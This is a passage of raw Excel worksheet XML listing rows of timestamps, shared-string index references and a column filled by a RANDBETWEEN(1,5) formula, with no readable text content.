      <c r="E27274" t="s">
        <v>24824</v>
      </c>
      <c r="F27274">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27275" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27275" s="1">
        <v>42887.601365740738</v>
      </c>
      <c r="C27275" t="s">
        <v>10</v>
      </c>
      <c r="D27275" t="s">
        <v>290</v>
      </c>
      <c r="E27275" t="s">
        <v>24824</v>
      </c>
      <c r="F27275">
        <f t="shared" ca="1" si="426"/>
        <v>1</v>
      </c>
    </row>
    <row r="27276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27276" s="1">
        <v>42887.571898148148</v>
      </c>
      <c r="C27276" t="s">
        <v>10</v>
      </c>
      <c r="D27276" t="s">
        <v>251</v>
      </c>
      <c r="E27276" t="s">
        <v>24825</v>
      </c>
      <c r="F27276">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27277" s="1">
        <v>42887.568680555552</v>
      </c>
      <c r="C27277" t="s">
        <v>10</v>
      </c>
      <c r="D27277" t="s">
        <v>151</v>
      </c>
      <c r="E27277" t="s">
        <v>24826</v>
      </c>
      <c r="F27277">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27278" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A27278" s="1">
        <v>42887.559525462966</v>
      </c>
      <c r="C27278" t="s">
        <v>10</v>
      </c>
      <c r="D27278" t="s">
        <v>6</v>
      </c>
      <c r="E27278" s="2" t="s">
        <v>18128</v>
      </c>
      <c r="F27278">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27279" s="1">
        <v>42887.519872685189</v>
      </c>
      <c r="C27279" t="s">
        <v>16</v>
      </c>
      <c r="E27279" t="s">
        <v>24827</v>
      </c>
      <c r="F27279">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27280" s="1">
        <v>42887.519189814811</v>
      </c>
      <c r="C27280" t="s">
        <v>10</v>
      </c>
      <c r="D27280" t="s">
        <v>6</v>
      </c>
      <c r="E27280" t="s">
        <v>24828</v>
      </c>
      <c r="F27280">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27281" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27281" s="1">
        <v>42887.471539351849</v>
      </c>
      <c r="C27281" t="s">
        <v>10</v>
      </c>
      <c r="D27281" t="s">
        <v>80</v>
      </c>
      <c r="E27281" t="s">
        <v>24829</v>
      </c>
      <c r="F27281">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27282" s="1">
        <v>42887.467233796298</v>
      </c>
      <c r="C27282" t="s">
        <v>10</v>
      </c>
      <c r="D27282" t="s">
        <v>52</v>
      </c>
      <c r="E27282" t="s">
        <v>24830</v>
      </c>
      <c r="F27282">
        <f t="shared" ca="1" si="426"/>
        <v>1</v>
      </c>
    </row>
    <row r="27283" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27283" s="1">
        <v>42887.464872685188</v>
      </c>
      <c r="C27283" t="s">
        <v>48</v>
      </c>
      <c r="E27283" t="s">
        <v>24831</v>
      </c>
      <c r="F27283">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27284" s="1">
        <v>42887.463888888888</v>
      </c>
      <c r="C27284" t="s">
        <v>10</v>
      </c>
      <c r="D27284" t="s">
        <v>52</v>
      </c>
      <c r="E27284" t="s">
        <v>24832</v>
      </c>
      <c r="F27284">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27285" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27285" s="1">
        <v>42887.457384259258</v>
      </c>
      <c r="C27285" t="s">
        <v>1501</v>
      </c>
      <c r="E27285" s="2" t="s">
        <v>24833</v>
      </c>
      <c r="F27285">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27286" s="1">
        <v>42887.425034722219</v>
      </c>
      <c r="C27286" t="s">
        <v>10</v>
      </c>
      <c r="D27286" t="s">
        <v>6</v>
      </c>
      <c r="E27286" t="s">
        <v>24834</v>
      </c>
      <c r="F27286">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27287" s="1">
        <v>42887.422071759262</v>
      </c>
      <c r="C27287" t="s">
        <v>10</v>
      </c>
      <c r="D27287" t="s">
        <v>89</v>
      </c>
      <c r="E27287" t="s">
        <v>16161</v>
      </c>
      <c r="F27287">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27288" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27288" s="1">
        <v>42887.415810185186</v>
      </c>
      <c r="C27288" t="s">
        <v>10</v>
      </c>
      <c r="D27288" t="s">
        <v>89</v>
      </c>
      <c r="F27288">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27289" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27289" s="1">
        <v>42887.399363425924</v>
      </c>
      <c r="C27289" t="s">
        <v>16</v>
      </c>
      <c r="E27289" t="s">
        <v>24835</v>
      </c>
      <c r="F27289">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27290" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27290" s="1">
        <v>42887.392442129632</v>
      </c>
      <c r="C27290" t="s">
        <v>73</v>
      </c>
      <c r="E27290" t="s">
        <v>24836</v>
      </c>
      <c r="F27290">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27291" s="1">
        <v>42887.390636574077</v>
      </c>
      <c r="C27291" t="s">
        <v>6</v>
      </c>
      <c r="D27291" t="s">
        <v>25</v>
      </c>
      <c r="F27291">
        <f t="shared" ca="1" si="426"/>
        <v>1</v>
      </c>
    </row>
    <row r="27292" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27292" s="1">
        <v>42887.380243055559</v>
      </c>
      <c r="C27292" t="s">
        <v>124</v>
      </c>
      <c r="E27292" s="2" t="s">
        <v>24837</v>
      </c>
      <c r="F27292">
        <f t="shared" ca="1" si="426"/>
        <v>1</v>
      </c>
    </row>
    <row r="27293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27293" s="1">
        <v>42887.378425925926</v>
      </c>
      <c r="C27293" t="s">
        <v>10</v>
      </c>
      <c r="D27293" t="s">
        <v>36</v>
      </c>
      <c r="E27293" t="s">
        <v>24838</v>
      </c>
      <c r="F27293">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27294" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27294" s="1">
        <v>42887.374282407407</v>
      </c>
      <c r="C27294" t="s">
        <v>10</v>
      </c>
      <c r="D27294" t="s">
        <v>89</v>
      </c>
      <c r="E27294" t="s">
        <v>24839</v>
      </c>
      <c r="F27294">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27295" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27295" s="1">
        <v>42887.370682870373</v>
      </c>
      <c r="C27295" t="s">
        <v>2210</v>
      </c>
      <c r="E27295" t="s">
        <v>32</v>
      </c>
      <c r="F27295">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27296" s="1">
        <v>42887.369710648149</v>
      </c>
      <c r="C27296" t="s">
        <v>11</v>
      </c>
      <c r="E27296" t="s">
        <v>32</v>
      </c>
      <c r="F27296">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27297" s="1">
        <v>42887.3675</v>
      </c>
      <c r="C27297" t="s">
        <v>1050</v>
      </c>
      <c r="E27297" t="s">
        <v>32</v>
      </c>
      <c r="F27297">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27298" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27298" s="1">
        <v>42887.367071759261</v>
      </c>
      <c r="C27298" t="s">
        <v>2210</v>
      </c>
      <c r="E27298" t="s">
        <v>32</v>
      </c>
      <c r="F27298">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27299" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27299" s="1">
        <v>42887.364965277775</v>
      </c>
      <c r="C27299" t="s">
        <v>10</v>
      </c>
      <c r="D27299" t="s">
        <v>89</v>
      </c>
      <c r="E27299" s="2" t="s">
        <v>24840</v>
      </c>
      <c r="F27299">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27300" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27300" s="1">
        <v>42887.36241898148</v>
      </c>
      <c r="C27300" t="s">
        <v>10</v>
      </c>
      <c r="D27300" t="s">
        <v>312</v>
      </c>
      <c r="E27300" t="s">
        <v>32</v>
      </c>
      <c r="F27300">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27301" s="1">
        <v>42887.360081018516</v>
      </c>
      <c r="C27301" t="s">
        <v>1050</v>
      </c>
      <c r="E27301" t="s">
        <v>32</v>
      </c>
      <c r="F27301">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27302" s="1">
        <v>42887.35628472222</v>
      </c>
      <c r="C27302" t="s">
        <v>10</v>
      </c>
      <c r="D27302" t="s">
        <v>312</v>
      </c>
      <c r="E27302" t="s">
        <v>32</v>
      </c>
      <c r="F27302">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27303" s="1">
        <v>42887.347962962966</v>
      </c>
      <c r="C27303" t="s">
        <v>2140</v>
      </c>
      <c r="E27303" t="s">
        <v>32</v>
      </c>
      <c r="F27303">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27304" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27304" s="1">
        <v>42887.326215277775</v>
      </c>
      <c r="C27304" t="s">
        <v>559</v>
      </c>
      <c r="E27304" s="2" t="s">
        <v>24841</v>
      </c>
      <c r="F27304">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27305" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27305" s="1">
        <v>42887.316967592589</v>
      </c>
      <c r="C27305" t="s">
        <v>48</v>
      </c>
      <c r="E27305" t="s">
        <v>24842</v>
      </c>
      <c r="F27305">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27306" s="1">
        <v>42887.263391203705</v>
      </c>
      <c r="C27306" t="s">
        <v>48</v>
      </c>
      <c r="E27306" t="s">
        <v>24843</v>
      </c>
      <c r="F27306">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27307" s="1">
        <v>42887.255115740743</v>
      </c>
      <c r="C27307" t="s">
        <v>71</v>
      </c>
      <c r="E27307" t="s">
        <v>24844</v>
      </c>
      <c r="F27307">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27308" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27308" s="1">
        <v>42887.24082175926</v>
      </c>
      <c r="C27308" t="s">
        <v>454</v>
      </c>
      <c r="E27308" s="2" t="s">
        <v>24845</v>
      </c>
      <c r="F27308">
        <f t="shared" ca="1" si="426"/>
        <v>1</v>
      </c>
    </row>
    <row r="27309" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27309" s="1">
        <v>42887.219108796293</v>
      </c>
      <c r="C27309" t="s">
        <v>69</v>
      </c>
      <c r="E27309" s="2" t="s">
        <v>24846</v>
      </c>
      <c r="F27309">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27310" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27310" s="1">
        <v>42887.180798611109</v>
      </c>
      <c r="C27310" t="s">
        <v>43</v>
      </c>
      <c r="E27310" s="2" t="s">
        <v>24847</v>
      </c>
      <c r="F27310">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27311" s="1">
        <v>42887.12703703704</v>
      </c>
      <c r="C27311" t="s">
        <v>60</v>
      </c>
      <c r="E27311" t="s">
        <v>24848</v>
      </c>
      <c r="F27311">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27312" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27312" s="1">
        <v>42887.09480324074</v>
      </c>
      <c r="C27312" t="s">
        <v>41</v>
      </c>
      <c r="E27312">
        <v>9996669155</v>
      </c>
      <c r="F27312">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27313" s="1">
        <v>42887.093819444446</v>
      </c>
      <c r="C27313" t="s">
        <v>41</v>
      </c>
      <c r="F27313">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27314" s="1">
        <v>42887.082106481481</v>
      </c>
      <c r="C27314" t="s">
        <v>2108</v>
      </c>
      <c r="F27314">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27315" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27315" s="1">
        <v>42887.080057870371</v>
      </c>
      <c r="C27315" t="s">
        <v>140</v>
      </c>
      <c r="D27315" t="s">
        <v>46</v>
      </c>
      <c r="E27315" s="2" t="s">
        <v>24849</v>
      </c>
      <c r="F27315">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27316" s="1">
        <v>42886.980949074074</v>
      </c>
      <c r="C27316" t="s">
        <v>139</v>
      </c>
      <c r="E27316" t="s">
        <v>24850</v>
      </c>
      <c r="F27316">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27317" s="1">
        <v>42886.872696759259</v>
      </c>
      <c r="C27317" t="s">
        <v>140</v>
      </c>
      <c r="D27317" t="s">
        <v>234</v>
      </c>
      <c r="E27317" t="s">
        <v>24851</v>
      </c>
      <c r="F27317">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27318" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27318" s="1">
        <v>42886.846550925926</v>
      </c>
      <c r="C27318" t="s">
        <v>67</v>
      </c>
      <c r="E27318" s="2" t="s">
        <v>24852</v>
      </c>
      <c r="F27318">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27319" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27319" s="1">
        <v>42886.820023148146</v>
      </c>
      <c r="C27319" t="s">
        <v>10</v>
      </c>
      <c r="D27319" t="s">
        <v>6</v>
      </c>
      <c r="E27319" s="2" t="s">
        <v>24853</v>
      </c>
      <c r="F27319">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27320" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27320" s="1">
        <v>42886.815613425926</v>
      </c>
      <c r="C27320" t="s">
        <v>10</v>
      </c>
      <c r="D27320" t="s">
        <v>89</v>
      </c>
      <c r="E27320" t="s">
        <v>24854</v>
      </c>
      <c r="F27320">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27321" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A27321" s="1">
        <v>42886.721319444441</v>
      </c>
      <c r="C27321" t="s">
        <v>10</v>
      </c>
      <c r="D27321" t="s">
        <v>33</v>
      </c>
      <c r="E27321" s="2" t="s">
        <v>24855</v>
      </c>
      <c r="F27321">
        <f t="shared" ca="1" si="426"/>
        <v>1</v>
      </c>
    </row>
    <row r="27322" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27322" s="1">
        <v>42886.706041666665</v>
      </c>
      <c r="C27322" t="s">
        <v>6</v>
      </c>
      <c r="D27322" t="s">
        <v>25</v>
      </c>
      <c r="E27322" s="2" t="s">
        <v>24856</v>
      </c>
      <c r="F27322">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27323" s="1">
        <v>42886.694907407407</v>
      </c>
      <c r="C27323" t="s">
        <v>10</v>
      </c>
      <c r="D27323" t="s">
        <v>6</v>
      </c>
      <c r="E27323" t="s">
        <v>24857</v>
      </c>
      <c r="F27323">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27324" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27324" s="1">
        <v>42886.684884259259</v>
      </c>
      <c r="C27324" t="s">
        <v>10</v>
      </c>
      <c r="D27324" t="s">
        <v>381</v>
      </c>
      <c r="E27324" t="s">
        <v>24858</v>
      </c>
      <c r="F27324">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27325" s="1">
        <v>42886.645891203705</v>
      </c>
      <c r="C27325" t="s">
        <v>10</v>
      </c>
      <c r="D27325" t="s">
        <v>713</v>
      </c>
      <c r="E27325" t="s">
        <v>24859</v>
      </c>
      <c r="F27325">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27326" s="1">
        <v>42886.635960648149</v>
      </c>
      <c r="C27326" t="s">
        <v>10</v>
      </c>
      <c r="D27326" t="s">
        <v>6</v>
      </c>
      <c r="E27326" t="s">
        <v>24860</v>
      </c>
      <c r="F27326">
        <f t="shared" ca="1" si="426"/>
        <v>4</v>
      </c>
    </row>
    <row r="27327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27327" s="1">
        <v>42886.618541666663</v>
      </c>
      <c r="C27327" t="s">
        <v>10</v>
      </c>
      <c r="D27327" t="s">
        <v>36</v>
      </c>
      <c r="E27327" t="s">
        <v>24861</v>
      </c>
      <c r="F27327">
        <f t="shared" ca="1" si="426"/>
        <v>2</v>
      </c>
    </row>
    <row r="27328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27328" s="1">
        <v>42886.61681712963</v>
      </c>
      <c r="C27328" t="s">
        <v>10</v>
      </c>
      <c r="D27328" t="s">
        <v>263</v>
      </c>
      <c r="E27328" t="s">
        <v>24862</v>
      </c>
      <c r="F27328">
        <f t="shared" ca="1" si="426"/>
        <v>3</v>
      </c>
    </row>
    <row r="27329" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27329" s="1">
        <v>42886.593819444446</v>
      </c>
      <c r="C27329" t="s">
        <v>6</v>
      </c>
      <c r="D27329" t="s">
        <v>821</v>
      </c>
      <c r="E27329" s="2" t="s">
        <v>24863</v>
      </c>
      <c r="F27329">
        <f t="shared" ca="1" si="426"/>
        <v>5</v>
      </c>
    </row>
    <row r="27330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27330" s="1">
        <v>42886.58252314815</v>
      </c>
      <c r="C27330" t="s">
        <v>10</v>
      </c>
      <c r="D27330" t="s">
        <v>41</v>
      </c>
      <c r="E27330" t="s">
        <v>24864</v>
      </c>
      <c r="F27330">
        <f t="shared" ref="F27330:F27393" ca="1" si="427">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="27331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27331" s="1">
        <v>42886.575983796298</v>
      </c>
      <c r="C27331" t="s">
        <v>1077</v>
      </c>
      <c r="E27331" t="s">
        <v>24865</v>
      </c>
      <c r="F27331">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27332" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27332" s="1">
        <v>42886.573576388888</v>
      </c>
      <c r="C27332" t="s">
        <v>6</v>
      </c>
      <c r="D27332" t="s">
        <v>194</v>
      </c>
      <c r="E27332" s="2" t="s">
        <v>24866</v>
      </c>
      <c r="F27332">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27333" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27333" s="1">
        <v>42886.572696759256</v>
      </c>
      <c r="C27333" t="s">
        <v>6</v>
      </c>
      <c r="D27333" t="s">
        <v>194</v>
      </c>
      <c r="E27333" s="2" t="s">
        <v>24867</v>
      </c>
      <c r="F27333">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27334" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27334" s="1">
        <v>42886.561608796299</v>
      </c>
      <c r="C27334" t="s">
        <v>29</v>
      </c>
      <c r="E27334" t="s">
        <v>32</v>
      </c>
      <c r="F27334">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27335" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27335" s="1">
        <v>42886.560057870367</v>
      </c>
      <c r="C27335" t="s">
        <v>6</v>
      </c>
      <c r="D27335" t="s">
        <v>194</v>
      </c>
      <c r="E27335" t="s">
        <v>24868</v>
      </c>
      <c r="F27335">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27336" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27336" s="1">
        <v>42886.553819444445</v>
      </c>
      <c r="C27336" t="s">
        <v>29</v>
      </c>
      <c r="E27336" t="s">
        <v>32</v>
      </c>
      <c r="F27336">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27337" s="1">
        <v>42886.525312500002</v>
      </c>
      <c r="C27337" t="s">
        <v>10</v>
      </c>
      <c r="D27337" t="s">
        <v>1160</v>
      </c>
      <c r="E27337" t="s">
        <v>24869</v>
      </c>
      <c r="F27337">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27338" s="1">
        <v>42886.513761574075</v>
      </c>
      <c r="C27338" t="s">
        <v>1931</v>
      </c>
      <c r="E27338" t="s">
        <v>24870</v>
      </c>
      <c r="F27338">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27339" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27339" s="1">
        <v>42886.512303240743</v>
      </c>
      <c r="C27339" t="s">
        <v>29</v>
      </c>
      <c r="E27339" t="s">
        <v>3549</v>
      </c>
      <c r="F27339">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27340" s="1">
        <v>42886.511307870373</v>
      </c>
      <c r="C27340" t="s">
        <v>29</v>
      </c>
      <c r="E27340" t="s">
        <v>24871</v>
      </c>
      <c r="F27340">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27341" s="1">
        <v>42886.504467592589</v>
      </c>
      <c r="C27341" t="s">
        <v>65</v>
      </c>
      <c r="E27341" t="s">
        <v>24872</v>
      </c>
      <c r="F27341">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27342" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27342" s="1">
        <v>42886.499884259261</v>
      </c>
      <c r="C27342" t="s">
        <v>10</v>
      </c>
      <c r="D27342" t="s">
        <v>52</v>
      </c>
      <c r="E27342" t="s">
        <v>24873</v>
      </c>
      <c r="F27342">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27343" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27343" s="1">
        <v>42886.499618055554</v>
      </c>
      <c r="C27343" t="s">
        <v>10</v>
      </c>
      <c r="D27343" t="s">
        <v>89</v>
      </c>
      <c r="E27343" t="s">
        <v>24874</v>
      </c>
      <c r="F27343">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27344" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27344" s="1">
        <v>42886.492326388892</v>
      </c>
      <c r="C27344" t="s">
        <v>10</v>
      </c>
      <c r="D27344" t="s">
        <v>17</v>
      </c>
      <c r="E27344" t="s">
        <v>24875</v>
      </c>
      <c r="F27344">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27345" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27345" s="1">
        <v>42886.487928240742</v>
      </c>
      <c r="C27345" t="s">
        <v>10</v>
      </c>
      <c r="D27345" t="s">
        <v>20</v>
      </c>
      <c r="E27345" t="s">
        <v>24876</v>
      </c>
      <c r="F27345">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27346" s="1">
        <v>42886.478784722225</v>
      </c>
      <c r="C27346" t="s">
        <v>10</v>
      </c>
      <c r="D27346" t="s">
        <v>163</v>
      </c>
      <c r="E27346" t="s">
        <v>24877</v>
      </c>
      <c r="F27346">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27347" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27347" s="1">
        <v>42886.476493055554</v>
      </c>
      <c r="C27347" t="s">
        <v>260</v>
      </c>
      <c r="E27347" t="s">
        <v>24878</v>
      </c>
      <c r="F27347">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27348" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27348" s="1">
        <v>42886.471689814818</v>
      </c>
      <c r="C27348" t="s">
        <v>1080</v>
      </c>
      <c r="E27348" t="s">
        <v>24879</v>
      </c>
      <c r="F27348">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27349" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27349" s="1">
        <v>42886.451620370368</v>
      </c>
      <c r="C27349" t="s">
        <v>16</v>
      </c>
      <c r="E27349" s="2" t="s">
        <v>24880</v>
      </c>
      <c r="F27349">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27350" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27350" s="1">
        <v>42886.444664351853</v>
      </c>
      <c r="C27350" t="s">
        <v>10</v>
      </c>
      <c r="D27350" t="s">
        <v>36</v>
      </c>
      <c r="E27350" t="s">
        <v>24881</v>
      </c>
      <c r="F27350">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27351" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27351" s="1">
        <v>42886.429131944446</v>
      </c>
      <c r="C27351" t="s">
        <v>48</v>
      </c>
      <c r="E27351" t="s">
        <v>24882</v>
      </c>
      <c r="F27351">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27352" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27352" s="1">
        <v>42886.402407407404</v>
      </c>
      <c r="C27352" t="s">
        <v>10</v>
      </c>
      <c r="D27352" t="s">
        <v>52</v>
      </c>
      <c r="E27352" t="s">
        <v>24883</v>
      </c>
      <c r="F27352">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27353" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27353" s="1">
        <v>42886.392881944441</v>
      </c>
      <c r="C27353" t="s">
        <v>16</v>
      </c>
      <c r="E27353" t="s">
        <v>24884</v>
      </c>
      <c r="F27353">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27354" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27354" s="1">
        <v>42886.390601851854</v>
      </c>
      <c r="C27354" t="s">
        <v>10</v>
      </c>
      <c r="D27354" t="s">
        <v>20</v>
      </c>
      <c r="E27354" s="2" t="s">
        <v>24885</v>
      </c>
      <c r="F27354">
